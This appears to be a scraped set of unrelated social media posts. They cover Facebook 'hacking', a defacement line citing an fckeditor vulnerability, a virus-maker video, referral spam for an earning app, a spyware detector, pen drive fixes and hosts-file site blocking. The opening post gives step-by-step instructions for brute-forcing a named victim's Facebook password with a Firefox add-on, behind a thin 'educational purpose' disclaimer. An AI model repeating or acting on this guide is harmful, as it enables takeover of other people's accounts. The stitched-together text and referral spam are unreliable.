"HOW TO HACK FACEBOOK ACCOUNT ? " Hacking a Facebook profile requires. 1- mozila firefox (with add on fireforce). 2- user name or email id of the victim. 2- time (a lot). so lets start step by step 1-Open https://www.facebook.com/ 2-enter user name or email id as u prefer 3-right click on the password box>fireforce>generate password>select the desired options(a-z,A-d,a-z n 0-1,.....) 4-enter the minimum and maximum number of charecters 5-enter the text identifies the page>try again choose whether to.... set radio button to failed 6-press save 7-wait fore some time 8-you are done password is on your screen thanx for reading this, hope u enjoyed it. This is just for educational purpose hacking someone's Facebook account is a crime Some times hacking threw Brute forcing may take days,month or Year depending on length of password u can download the add-on from here https://adf.ly/cYeHW Thanks nai bolnay ka request send karnay ka or IB mai tang nmai karnay ka
Hacked by http://www.youtube.com/watch?v=Kq8k3Xt4bB8&index=8&list=UUV4jT0AIk41hMfHIlsHbi8Q fckeditor vulnerability
#AmnestyInternational backs #Detekt tool to scan for state spyware on computers - http://www.theguardian.com/…/amnesty-launches-detekt-app-sc… - #EFF #PrivacyInternational #DigitaleGesellschaft . detailed instructions including free download link: https://resistsurveillance.org/ . see also: http://www.amnesty.org/…/new-tool-spy-victims-detect-govern… http://www.amnesty.org/…/detekt-new-software-tool-cat-and-m… http://techcrunch.com/2014/11/20/detekt/ http://www.truthdig.com/…/amnesty_release_free_tool_detekt_… (please note that Detekt does NOT scan mobile phones!)
Episode 157 Virus Macker. program. Virus maker. .. Programming a friend page OS Virus https://www.youtube.com/watch?v=Nl3FDvLWeS4&feature=youtu.be
Very nice theme but frustrated me so much how to make your own distro and your rights in 5 minutes all will wonder how how? The truth is: 3 lets you make any distribution of any packages and full your leave you with site https://susestudio.com/#login #_Yousuf_Ayman
Hide Your Online Identity and Bypass Restrictions on Mozilla Firefox Hello guys! Today I am going to show you an easy trick to hide your online identity and bypass country and browsing restrictions for users of Firefox. There are some other ways to do this for chrome and other browsers as well as applications. But that is for another day. Today we will see only about Firefox. Information:- http://bit.do/UJey #thehackerdevil #hackbox #hacking #tricks #tips
Bake or Fry your own Sweet Potato Fries! http://www.wikihow.com/Make-Sweet-Potato-Fries
Please read once. Here is an app which i found just one weak ago and yesterday i cashout 10$. You can see proof below. so if you also want then just Install WHAFF and earn money. Please use this code to get your first $ code=AE04942 you can download this app from play store. Just search WHAFF in play store. starting earning now. Proof and For more info visit http://androidearning.wordpress.com/category/android/
Fix Unable to Format Pen Drive Problem.. Most of the times, Whenever we try to format a pen drive or other removable storage devices like memory cards, flash drives, or external HDD. We get an error like “Can’t format the drive, quit any disk utilities or other programs that are using this drive, and then try formatting again”. There may be two reasons for this problem, either your pen drive is hardware faulty or your pen drive is infected from viruses. In case if its, hardware faulty then there is no way to fix it, until and unless it’s in warranty period. If it’s due to virus infection, then you can fix the unable to format or can’t format the drive problem easily. There are 3 ways to solve windows can’t format this drive error, you can follow any of the given ways to fix your external storage device unable to format problem. Method 1: To Fix Unable to Format Pen drive Problem 1) Plug in pen drive into your computer and click on start button. 2) Open run prompt and type CMD and press enter. It will open MS DOS Command Prompt. 3) In Dos Prompt, Type “Format X:/FAT32”, without inverted commas and press enter. Don’t forget to replace X with your pen drive or External HDD drive letter. 4) Once done, your pen drive will start formatting. Most of the times above method works, In case if it’s not working for you. Then follow next Method Method 2: To Fix Unable to Format Pen drive Problem 1) Plug in your pen drive into computer, and click on start button. 2) Now, Click on Run prompt and then type “compmgmt.msc”, without inverted commas in run prompt and press enter. It will open a computer management window. 3) Click on Disk management from right pane, A Disk management options pane will open on right side. 4) Right click on your pen drive and select format. it will format your pen drive suffering with cannot format the drive problem, In case If both the above methods are not working for you, then try the 3rd one. It will work for sure. Method 3: To Fix Unable to Format Pen drive Problem 1) Plug in your pen drive into your computer. 2) Insert windows installation disk and reboot your computer. 3) Enter any key and proceed with the installation, at a particular point of time, It will give you a option like “Format Your PC”. Press enter key and proceed with it. 4) After that, Windows will detect all your hard disk partitions, pen drive will also appear on screen. 5) Now, Select Pen drive and then press “Delete” key to format your pen drive. Method 4: Write Protection removal You can remove write protection from your usb flash drive using the below method: 1. Open start menu, in the search bar type regedit and press enter. This wil open the registry editor. 2. Navigate to the following path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies Note: If the registry key StorageDevicePolicies does not exist, you will need to create it manually. 3. Highlight StorageDevicePolicies, and then create a New DWORD (32-bit) Value named as WriteProtect. 4. Double click the key WriteProtect in the right window and set the value to 0 in the Value Data Box and press OK button 5. Restart your computer and try copying files into your USB drives. //////Otherwise use hp formatting tool u can download it from http://en.kioskea.net/…/download-127-hp-usb-disk-storage-fo… Almost each and every time, the above methods will format your pen drive, which is suffering from unable to format or cannot format the drive error. If none of the above methods are working for you, then most probably your pen drive is hardware faulty. What you think on this article, any kind of queries will be appreciated.
《=Block any websites in your Computer/Laptop without any software=》 ~>Steps 1:~)Open Run Dialog Box. (You can do this by pressing Windows Key + R) 2:~)run type, notepad %SystemRoot%\system32\drivers\etc\hosts, and press enter. 3:~)127.0.0.1 localhost Under this, add the name(s) of website(s) that you want to block, in the following format, 127.0.0.1 #websiteToBlock For instance, if you wish to block twitter from your computer, then the following lines must be added to the hosts file, 127.0.0.1 www.twitter.com 127.0.0.1 twitter.com This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy. Hope this small tutorial could keep you going in simple way of blocking websites